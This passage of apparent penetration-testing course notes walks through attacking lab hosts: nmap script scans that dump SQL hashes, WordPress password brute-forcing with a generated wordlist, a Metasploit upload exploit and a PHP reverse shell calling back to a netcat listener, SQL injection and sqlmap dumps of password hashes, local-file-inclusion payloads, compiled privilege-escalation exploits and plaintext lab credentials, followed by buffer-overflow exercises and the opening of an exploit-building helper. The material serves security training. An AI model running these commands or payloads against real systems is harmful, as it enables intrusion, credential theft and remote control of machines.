  833. clear
  834. # FTP
  835. for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
  836. echo "Done with FTP."
  837.  
  838. clear
  839. # SSH
  840. for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
  841. echo "Done with SSH."
  842.  
  843. clear
  844. # SUNRPC
  845. for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
  846. echo "Done with SunRPC."
  847.  
  848. clear
  849. # POP3
for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script="banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg" $x > /tmp/NetworkAudit/scan/pop3/$x ; done
echo "Done with POP3."
# (the --script list is quoted so the shell does not expand ssl* against files in the current directory)

# clear
# HTTP - Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
# as a good reference for what nmap nse scripts to run against port 80 and 443
# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
# echo "Done with HTTP."


# clear
# HTTPS - same fix needed as for HTTP above; note the separate https host list and output directory
# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/https/$x ; done
# echo "Done with HTTPS."


clear
# SQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
echo "Done with MS SQL."

clear
# Oracle Servers
# FIX THIS: needs brute force wordlists (oracle-enum-users.sid / userdb) for this to run correctly
# (all scripts go in ONE --script list; a second --script flag replaces the first)
# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute,oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x > /tmp/NetworkAudit/scan/oracle_databases/$x ; done
# echo "Done with Oracle."

clear
# MongoDB
for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
echo "Done with MongoDB."


clear
# MySQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x > /tmp/NetworkAudit/scan/mysql_databases/$x ; done
echo "Done with MySQL."


# Add postgres nse scripts
# References:
# https://nmap.org/nsedoc/lib/pgsql.html
# https://nmap.org/nsedoc/scripts/pgsql-brute.html
#

echo " "
echo " "
sleep 1
clear
echo "Done, now check your results."
sleep 2
clear
cd /tmp/NetworkAudit/scan/
ls
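The per-service loops above are copy-pasted and that is where the bugs crept in (one loop lost the nmap binary, one passed --script twice so nmap kept only the last list, and `cat file` inside backticks splits on any whitespace and feeds junk lines straight to nmap as arguments). The driver below is an added example, not part of the lab script, written the way the referenced NmapScannerAsync.py does it: in Python, building an argv per host. It assumes the same layout the script uses (/tmp/NetworkAudit/discovered_services/<name>_hosts with one IPv4 per line, reports under /tmp/NetworkAudit/scan/<dir>/<ip>), the service table is the one the script already scans plus nmap's pgsql-brute for the "Add postgres nse scripts" TODO, and the host lists it is checked against are constructed.

```python
#!/usr/bin/env python3
"""Added example, not part of the original lab script: one driver for the
per-service nmap NSE loops above. Assumed layout (same as the script):
/tmp/NetworkAudit/discovered_services/<name>_hosts  one IPv4 per line
/tmp/NetworkAudit/scan/<dir>/<ip>                   one -oN report per host
pgsql-brute is nmap's PostgreSQL script, added for the postgres TODO."""
import ipaddress
import os
import subprocess
import sys

AUDIT_ROOT = os.environ.get("AUDIT_ROOT", "/tmp/NetworkAudit")

# (host list name, output directory, port, NSE scripts)
SERVICES = [
    ("mssql", "mssql_databases", 1433,
     ["ms-sql-dump-hashes", "ms-sql-empty-password", "ms-sql-info"]),
    ("mongodb", "mongodb_databases", 27017, ["mongodb-databases", "mongodb-info"]),
    ("mysql", "mysql_databases", 3306,
     ["mysql-databases", "mysql-empty-password", "mysql-info",
      "mysql-users", "mysql-variables"]),
    ("postgres", "postgres_databases", 5432, ["pgsql-brute"]),
]


def read_hosts(lines, source="<hosts>"):
    """Return the valid IPv4 addresses in a host list. Blank lines and '#'
    comments are skipped; anything else that is not an address is reported and
    dropped instead of being handed to nmap as an argument."""
    hosts = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            hosts.append(str(ipaddress.IPv4Address(line)))
        except ipaddress.AddressValueError:
            print(f"{source}:{lineno}: skipping {line!r}", file=sys.stderr)
    return hosts


def nmap_argv(port, scripts, host, outfile):
    """One nmap argv: a list (never a shell string, so a hostile line in the host
    file cannot inject options) with every NSE script in a single --script value
    and the normal report written with -oN."""
    return ["nmap", "-Pn", "-n", "--open", f"-p{port}",
            "--script=" + ",".join(scripts), "-oN", outfile, host]


def plan_scans(hosts, port, scripts, outdir):
    """One argv per host; the report is named after the host like the loops above."""
    return [nmap_argv(port, scripts, h, os.path.join(outdir, h)) for h in hosts]


def scan_service(name, outdir_name, port, scripts, root=AUDIT_ROOT, dry_run=True):
    """Scan every host listed for one service. With dry_run the planned argv lists
    are returned without running anything (also how the logic is tested)."""
    hosts_file = os.path.join(root, "discovered_services", f"{name}_hosts")
    outdir = os.path.join(root, "scan", outdir_name)
    if not os.path.isfile(hosts_file):
        print(f"no host list for {name}, skipping", file=sys.stderr)
        return []
    with open(hosts_file) as fh:
        hosts = read_hosts(fh, hosts_file)
    os.makedirs(outdir, exist_ok=True)
    planned = plan_scans(hosts, port, scripts, outdir)
    if not dry_run:
        for argv in planned:
            subprocess.run(argv, check=False)
    return planned


if __name__ == "__main__":
    # Without --run the commands are only printed (dry run); --run executes them.
    live = "--run" in sys.argv[1:]
    for name, outdir_name, port, scripts in SERVICES:
        for argv in scan_service(name, outdir_name, port, scripts, dry_run=not live):
            print(" ".join(argv))
        print(f"Done with {name}.")
```

Run it once without --run to review the exact command lines it will issue, then with --run. Adding a service is one line in SERVICES rather than another hand-edited loop.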



----------------------------------------------------------------------------------------------------------------------------

######################################
----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
######################################

######################
# Attacking Minotaur #
######################

Step 1: Portscan/Bannergrab the target host
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.117
-----------------------------------------------------------------------



Step 2: Vulnerability scan the web server
---------------------------Type This-----------------------------------
nikto.pl -h 172.31.2.117
-----------------------------------------------------------------------



Step 3: Directory brute-force the webserver
---------------------------Type This-----------------------------------
dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
-----------------------------------------------------------------------

### dirb output ###
==> DIRECTORY: http://172.31.2.117/bull/
-----------------------------------------------------------------------


Step 4: Run the WordPress vulnerability scanner, then build a site-specific wordlist and brute-force the login
---------------------------Type This-----------------------------------
wpscan --url http://172.31.2.117/bull/ -r --enumerate u,p,t,tt


cewl -w words.txt http://172.31.2.117/bull/


cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt

wc -l whateverbro.txt

john --wordlist=whateverbro.txt --rules --stdout > words-john.txt

wc -l words-john.txt

wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
-----------------------------------------------------------------------
***** the username comes from the --enumerate u output; the password wpscan reports is used in Step 5 *****
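The middle of that pipeline (cewl words in, `john --rules --stdout` candidates out) is what turns a plain list of site words into guesses that actually match a WordPress password: cewl returns words exactly as they appear on the page, lower-case and letters only, so a capitalised or year-suffixed form is only tried if something derives it first. The script below is an added example, not part of the notes and not john's real ruleset: a hand-picked subset of john-style rules, a min-length cut like cewl's -m, and order-preserving deduplication so the likeliest guesses stay at the top of the list wpscan reads. The fallback words in `__main__` are constructed.

```python
#!/usr/bin/env python3
"""Added example, not from the original notes: a small emulation of the
'john --wordlist=... --rules --stdout' step above. The rules are a hand-picked
subset written for this example, not john's ruleset.
Usage: python3 mangle.py < whateverbro.txt > words-john.txt"""
import sys
from itertools import chain

LEET = str.maketrans("aeios", "43105")
YEARS = ("2018", "2019")      # assumption: recent years are the usual suffixes


def rules(word):
    """Yield password candidates for one base word (john-style rule per line)."""
    cap = word.capitalize()
    yield word                      # ':'  as found
    yield cap                       # 'c'  capitalise first letter
    yield word.upper()              # 'u'  all upper
    yield word[::-1]                # 'r'  reversed
    yield word.translate(LEET)      # simple leet substitution
    for n in range(10):             # '$0'..'$9' append one digit
        yield f"{word}{n}"
        yield f"{cap}{n}"
    for year in YEARS:              # append a year to both forms
        yield f"{word}{year}"
        yield f"{cap}{year}"
    yield f"{cap}!"                 # capitalise + common symbol
    yield f"{cap}123"


def mangle(words, min_len=6):
    """Apply rules() to every word, drop candidates shorter than min_len (cewl's -m),
    and dedupe while keeping first-seen order so the likeliest guesses stay first."""
    seen = set()
    out = []
    base = (w.strip() for w in words)
    for cand in chain.from_iterable(rules(w) for w in base if w):
        if len(cand) < min_len or cand in seen:
            continue
        seen.add(cand)
        out.append(cand)
    return out


if __name__ == "__main__":
    # constructed fallback words when nothing is piped in
    source = sys.stdin if not sys.stdin.isatty() else ["bighornedbulls", "minotaur"]
    for candidate in mangle(source):
        print(candidate)
```

With the lab's own word the capitalised rule is the one that matters: `bighornedbulls` becomes `Bighornedbulls` on the second line of output, which is why the wpscan run against the john-expanded list succeeds where the raw cewl list would not.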




Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
---------------------------Type This-----------------------------------
msfconsole

use exploit/unix/webapp/wp_slideshowgallery_upload

set RHOST 172.31.2.117

set RPORT 80

set TARGETURI /bull

set WP_USER bully

set WP_PASSWORD Bighornedbulls

exploit
-----------------------------------------------------------------------

Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
and then from the lab network attacking other students.

So the payload has to call back to a lab host that is already compromised (172.31.2.64, taken over in the section further down) instead of to the attacker's VPN address.


---------------------------Type This-----------------------------------
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

tar -zxvf php-reverse-shell-1.0.tar.gz

cd php-reverse-shell-1.0/

nano php-reverse-shell.php
-----------------------------------------------------------------------
***** change the $ip and $port variables to a host that you have already compromised in the network
***** for this example I chose 172.31.2.64 and kept port 1234


---------------------------Type This-----------------------------------
chmod 777 php-reverse-shell.php
cp php-reverse-shell.php ..
-----------------------------------------------------------------------



Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
---------------------------Type This-----------------------------------
python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
-----------------------------------------------------------------------



Set up netcat listener on previously compromised host (it must be listening before the shell is triggered)
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
webmin1980


nc -lvp 1234
-----------------------------------------------------------------------




---------------------Type This in your browser ------------------------
http://172.31.2.117/bull/wp-content/uploads/slideshow-gallery/php-reverse-shell.php
-----------------------------------------------------------------------


Now check your listener to see if you got the connection
---------------------------Type This-----------------------------------
id

/sbin/ifconfig

python -c 'import pty;pty.spawn("/bin/bash")'
-----------------------------------------------------------------------

---------------------------Type This-----------------------------------
cd /tmp
cat > exploit2.c << 'out'
-----------------------------------------------------------------------
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/

**************hit enter a few times *****************
***** the delimiter is quoted ('out') so the shell leaves $, backticks and backslashes in the pasted C source alone, and > (not >>) means a retry overwrites the file instead of appending a second copy that will not compile *****

---------------------------Type This-----------------------------------
out


gcc -o boom2 exploit2.c

./boom2

id
-----------------------------------------------------------------------




---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.181
-----------------------------------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)


---------------------------Type This-----------------------------------
sudo nmap -sU -p69,161 172.31.2.181
-----------------------------------------------------------------------
PORT STATE SERVICE
69/udp closed tftp
161/udp open snmp


---------------------------Type This-----------------------------------
sudo apt-get -y install onesixtyone snmp

wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt

onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
----------------------------------------------------------------------
Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1

---------------------------Type This-----------------------------------
grep -v TENmanUFactOryPOWER wordlist-common-snmp-community-strings.txt > snmp-community-strings.txt

onesixtyone -c snmp-community-strings.txt 172.31.2.181

snmpwalk -Os -c public -v 1 172.31.2.181
---------------------------------------------------------------------

Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."

Google the sentence, and I find out that the whole sentence is "There is a house in New Orleans they call it the rising sun".

Try to SSH to the box using the credentials eric:therisingsun


---------------------------Type This-----------------------------------
ssh -l eric 172.31.2.181
therisingsun

id
cat /etc/issue
uname -a
cat /etc/*release

---------------------------Type This-----------------------------------
cat > exploit.c << 'out'

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- this ends the heredoc and writes the file...



---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom

id


......YEAH - do the happy dance!!!!
How to go after 172.31.2.217 (the iSCSI target on tcp/3260)
Reference: https://t0w3ntum.com/2017/01/07/baffle/


---------------------------Type This-----------------------------------
sudo nmap -sV -p 3260 172.31.2.217


sudo apt install open-iscsi

sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260

sudo iscsiadm -m node -p 172.31.2.217 --login
***** the login needs no CHAP credentials, so anyone on the network can attach the exported disk *******

sudo /bin/bash

fdisk -l
***** your own disk is /dev/sda (with /dev/sda5 as Linux swap); the iSCSI LUN shows up as the next device, here /dev/sdb *******

mkdir /mnt/217vm

mount /dev/sdb /mnt/217vm

cd /mnt/217vm

ls

cat flag1.txt

file bobsdisk.dsk
***** a filesystem image inside the LUN; mount it over a loop device *******

mkdir /media/bobsdisk

mount -o loop /mnt/217vm/bobsdisk.dsk /media/bobsdisk

cd /media/bobsdisk/

ls

cat ToAlice.eml
***** read the mail: it gives the passphrase supercalifragilisticoespialidoso ******

grep flag ToAlice.eml

file ToAlice.csv.enc

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
supercalifragilisticoespialidoso
***** the passphrase is typed at the prompt rather than passed with -pass so it does not land in the process list or shell history; -md sha256 has to match the digest the file was encrypted with, otherwise openssl derives the wrong key and stops with 'bad decrypt' ******

ls

cat ToAlice.csv

-----------------------------------------------------
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

-----------------------------------------------------
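Why the -md sha256 flag on that openssl command decides whether the file decrypts at all: without -pbkdf2, openssl enc turns the passphrase into the AES key and IV with EVP_BytesToKey (D1 = H(pass||salt), D2 = H(D1||pass||salt), ... concatenated until 32 key bytes plus 16 IV bytes exist), and H is whatever -md names. OpenSSL 1.1.0 changed the default from md5 to sha256, so a file encrypted on one side and decrypted with the other digest derives a different key and ends in "bad decrypt". The script below is an added example, not from the notes: it implements that derivation and the "Salted__" header parse so the two keys can be compared side by side. The AES step itself is left to openssl. The passphrase is the one from ToAlice.eml; the salt is constructed.

```python
#!/usr/bin/env python3
"""Added example, not from the original notes: how 'openssl enc' (without
-pbkdf2) derives key and IV from a passphrase, and the effect of -md.
Only the derivation and the file header are handled here; AES is left to openssl."""
import hashlib

KEY_LEN, IV_LEN = 32, 16   # aes-256-cbc


def evp_bytes_to_key(password: bytes, salt: bytes, md: str = "sha256",
                     key_len: int = KEY_LEN, iv_len: int = IV_LEN):
    """OpenSSL EVP_BytesToKey with count=1, as used by 'openssl enc'.
    Returns (key, iv). md is the digest named by -md (md5 before OpenSSL 1.1.0,
    sha256 from 1.1.0 on)."""
    if len(salt) != 8:
        raise ValueError("openssl enc salts are exactly 8 bytes")
    derived, block = b"", b""
    while len(derived) < key_len + iv_len:
        # each round hashes the previous digest, the passphrase and the salt
        block = hashlib.new(md, block + password + salt).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


def split_salted(blob: bytes):
    """Split 'openssl enc' output into (salt, ciphertext). The 8-byte salt follows
    the literal 'Salted__' magic; files made with -nosalt have no header."""
    if len(blob) < 16 or blob[:8] != b"Salted__":
        raise ValueError("not a salted 'openssl enc' file")
    return blob[8:16], blob[16:]


def keys_for_both_digests(password: bytes, salt: bytes):
    """The key OpenSSL >= 1.1.0 (sha256) and < 1.1.0 (md5) derive from the same
    passphrase and salt; they differ, which is the whole 'bad decrypt' story."""
    return {md: evp_bytes_to_key(password, salt, md)[0] for md in ("sha256", "md5")}


if __name__ == "__main__":
    pw = b"supercalifragilisticoespialidoso"     # passphrase from ToAlice.eml
    salt = bytes(range(8))                        # constructed salt for the demo
    for md, key in keys_for_both_digests(pw, salt).items():
        print(f"{md:6} key={key.hex()}")
    demo_file = b"Salted__" + salt + b"\x00" * 32  # constructed header + dummy ciphertext
    print("salt from header:", split_salted(demo_file)[0].hex())
```

If a real ToAlice.csv.enc refuses to decrypt with one digest, read its first 16 bytes with split_salted, derive the key with the other digest, and the mismatch is visible before touching the cipher.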

The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
-- view source

Found this string in the source:
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK

------ https://www.base64decode.org/ -------
------ Decoded, but didn't find a flag (it is the Seinfeld Soup Nazi scene, ending in "NO FLAG FOR YOU") -----


http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
-- view source --
-- Nothing in source --

Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
-- view source --
-- Nothing in source --


The ?p= parameter names a PHP file that index.php includes, so use the php://filter wrapper to have the source of those files returned base64-encoded instead of executed (a local file inclusion used as a source read):
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php

------ https://www.base64decode.org/ -------
Decode the string returned for flag.php:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

-------------------------------------------------------------------
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>
***** the flag lives only in a PHP comment, which is why ?p=flag rendered nothing: the include executed flag.php, while the filter handed back its source *****



============================================ Attacking another server because I need a reverse shell =========================================
---------------------------------------------------------------------------------------------------------------------------------------------------------

Attack steps:
-------------



Step 1: Ping sweep the target network
-------------------------------------


---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------



- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238



Step 2: Port scan target system
-------------------------------


---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------



-------------Scan Results--------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
514/tcp filtered shell
1037/tcp filtered ams
6667/tcp open irc ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------


Step 3: Vulnerability Scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------


Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------


---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.64 -v
-----------------------------------------------------------------------
or with dirb (built from source)

---------------------------Type This-----------------------------------
git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

./dirb

./dirb http://172.31.2.64 wordlists/big.txt
-----------------------------------------------------------------------



Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself


..... really didn't get much from here so we just opened the web page in a browser
http://172.31.2.64/

.....browsed to the webpage and saw that it pointed to:
http://172.31.2.64/jabc

....clicked on documentation link and found hidden text that pointed to here:
http://172.31.2.64/jabcd0cs/

....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
https://www.exploit-db.com/exploits/32075/

Tried the sql injection described in exploit-db (no closing quote is needed; the UNION has to match the original query's nine columns, which is why the payload lists 1..9 and puts the function call in the column that is echoed back):
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9



Tried to run sqlmap against the target


---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------



FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net



---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------

username: webmin
hash: b78aae356709f8c31118ea613980954b

https://hashkiller.co.uk/md5-decrypter.aspx

hash: b78aae356709f8c31118ea613980954b
pass: webmin1980


ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH (the web app password is reused for the system account).



---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
webmin1980

id

cat /etc/*release
-----------------------------------------------------------------------



....tired of not having a real command shell...


---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'


cd /tmp

pwd


cat > exploit.c << 'out'

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- this ends the heredoc and writes the file...



---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom
-----------------------------------------------------------------------


------------exploit failed, damn let's try another one ---------



---------------------------Type This-----------------------------------
cat > exploit2.c << 'out'

**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/


out


gcc -o boom2 exploit2.c

./boom2

id


......YEAH - do the happy dance!!!!
=============================================== Now back to the previous server ==============================================================




#######################################
----------- ############### # Day 3: Intro to Exploit Development ################ -----------
#######################################

The first exploit
https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip

SLMail Scripts Questions

SLmail1.py
How do you start SLMail?
What do you have to be careful of when attaching your debugger to the application?
How many As are you sending to the application?

SLmail2.py
What tool(s) can be used to generate a cyclic pattern?
What port are we attacking?
What verb are we attacking?

SLmail3.py
What is the value contained in EIP?
What is the portion of the cyclic pattern that we must search for?
What is the distance to EIP?

SLmail4.py
What do you overwrite EIP with in this script?
What is the length of your shellcode in this script?
What is the difference between SOCK_STREAM and SOCK_DGRAM?

SLmail5.py
What is struct.pack and why are we using it?
Where is our JMP ESP coming from?
What is the length of our shellcode in this script?

SLmail6.py
Why do you subtract the top of ESP from the bottom of ESP in this script?
What is the length of our shellcode in this script?
What is the distance to EIP in this script?


SLmail7.py
How do you test for bad characters?
What are the bad characters in this script?
What is the address of the JMP ESP in this script and what DLL does it come from?


SLmail8.py
What is DEP and how do you disable it?
What is the purpose of the stack adjustment?
What is the purpose of the NOP sled?


If you got through SLMail comfortably - then try the script below.
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip


Analysis of the exploit code:
https://www.exploit-db.com/exploits/15689/
What is the target platform that this exploit works against?
What is the variable name for the distance to EIP?
What is the actual distance to EIP in bytes?
Describe what is happening in the variable 'junk2'?

Analysis of the training walk-through based on EDB-ID 15689:
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip

ff1.py
What does the sys module do?
What is sys.argv[1] and sys.argv[2]?
What application entry point is being attacked in this script?

ff2.py
Explain what is happening in lines 18 - 20
What is pattern_create.rb doing and where can I find it?
Why can't I just double click the file to run this script?

ff3.py
Explain what is happening in lines 17 to 25?
Explain what is happening in lines 30 to 32?
Why is everything below line 35 commented out?

ff4.py
Explain what is happening in lines 13 to 15.
Explain what is happening in line 19.
Why is everything below line 35 commented out?

ff5.py
Explain what is happening in line 15.
What is struct.pack?
How big is the shellcode in this script?

ff6.py
What is the distance to EIP?
How big is the shellcode in this script?
What is the total byte length of the data being sent to this app?

ff7.py
What is a tuple in python? An immutable (unchangeable) list
How big is the shellcode in this script? 1000 Bytes
Did your app crash from this script? No

ff8.py
How big is the shellcode in this script?
What is try/except in python?
What is socket.SOCK_STREAM in Python?

ff9.py
What is going on in lines 19 and 20?
What is the length of the NOPs?
What is socket.SOCK_STREAM in Python?

ff010.py
What is going on in lines 18 - 20?
How would a stack adjustment help this script?
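The SLmail and ff questions above all circle the same four building blocks: the cyclic pattern and how the EIP value seen in the debugger becomes the distance to EIP, struct.pack for a little-endian return address, the bad-character probe, and the final junk + EIP + NOP sled + shellcode layout. The script below is an added example, not code from the SLmail or ff zips: it reproduces the Metasploit pattern (the A-Z / a-z / 0-9 triple cycle, so the numbers match pattern_create.rb / pattern_offset.rb), turns an EIP value into an offset, builds the \x01..\xff probe, and refuses to assemble a payload whose return address or shellcode contains a bad byte. The offset, address, lengths and "shellcode" in `__main__` are made-up demonstration values, not the SLmail ones.

```python
#!/usr/bin/env python3
"""Added example, not from the SLmail/ff training scripts: the reusable pieces of
a classic x86 stack-overflow exploit. Constructed values only; nothing here is
the SLmail offset, JMP ESP address or shellcode."""
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

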